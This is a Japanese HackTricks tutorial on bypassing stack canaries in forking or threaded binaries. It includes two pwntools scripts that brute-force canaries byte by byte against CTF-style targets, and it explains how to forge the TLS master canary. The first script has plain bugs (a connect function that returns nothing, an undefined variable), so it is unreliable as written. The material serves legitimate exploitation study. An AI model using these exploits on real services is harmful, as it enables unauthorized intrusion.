BFフォークされたおよびスレッド化されたスタックカナリア
Reading time: 7 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
カナリアとPIE(位置独立実行可能ファイル)によって保護されたバイナリに直面している場合、これらをバイパスする方法を見つける必要があるかもしれません。
note
checksec
がバイナリがカナリアによって保護されていることを見つけられない場合があります。これは静的にコンパイルされており、関数を特定できないためです。
ただし、関数呼び出しの最初にスタックに値が保存され、その値が終了前にチェックされるのを見つけることで、手動で気づくことができます。
ブルートフォースカナリア
単純なカナリアをバイパスする最良の方法は、バイナリが新しい接続を確立するたびに子プロセスをフォークするプログラムである場合です(ネットワークサービス)。なぜなら、接続するたびに同じカナリアが使用されるからです。
したがって、カナリアをバイパスする最良の方法は、文字ごとにブルートフォースすることであり、推測したカナリアバイトが正しいかどうかは、プログラムがクラッシュしたか、通常のフローを続けているかを確認することで判断できます。この例では、関数は8バイトのカナリア(x64)をブルートフォースし、正しく推測されたバイトと不正なバイトをチェックすることで区別します。サーバーからレスポンスが返されるかどうかを確認します(他の状況ではtry/exceptを使用することもできます):
例1
この例は64ビット用に実装されていますが、32ビット用にも簡単に実装できます。
from pwn import *
def connect():
r = remote("localhost", 8788)
def get_bf(base):
canary = ""
guess = 0x0
base += canary
while len(canary) < 8:
while guess != 0xff:
r = connect()
r.recvuntil("Username: ")
r.send(base + chr(guess))
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
例 2
これは32ビット用に実装されていますが、64ビットに簡単に変更できます。
また、この例ではプログラムが最初に入力のサイズを示すバイトとペイロードを期待していることに注意してください。
from pwn import *
# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Return the canary
return known_canary
# Start the target process
target = process('./feedme')
#gdb.attach(target)
# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
スレッド
同じプロセスのスレッドは同じカナリアトークンを共有するため、バイナリが攻撃のたびに新しいスレッドを生成する場合、カナリアをブルートフォースすることが可能です。
さらに、カナリアで保護されたスレッド関数内のバッファオーバーフローを使用して、TLSに保存されたマスターカナリアを変更することができます。これは、スレッドのスタック内のbofを介してTLSが保存されているメモリ位置に到達することが可能であるためです。
その結果、チェックは同じ(ただし変更された)2つのカナリアを使用しているため、緩和策は無意味です。
この攻撃は次の書き込みで実行されます: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads
また、https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015のプレゼンテーションも確認してください。ここでは、通常TLSは**mmap
によって保存され、スレッドのスタック**が作成されるときもmmap
によって生成されるため、前述の書き込みで示されたようにオーバーフローが可能であることが言及されています。
その他の例と参考文献
- https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
- 64ビット、PIEなし、nx、BFカナリア、
execve
を呼び出すROPをメモリに書き込み、そこにジャンプします。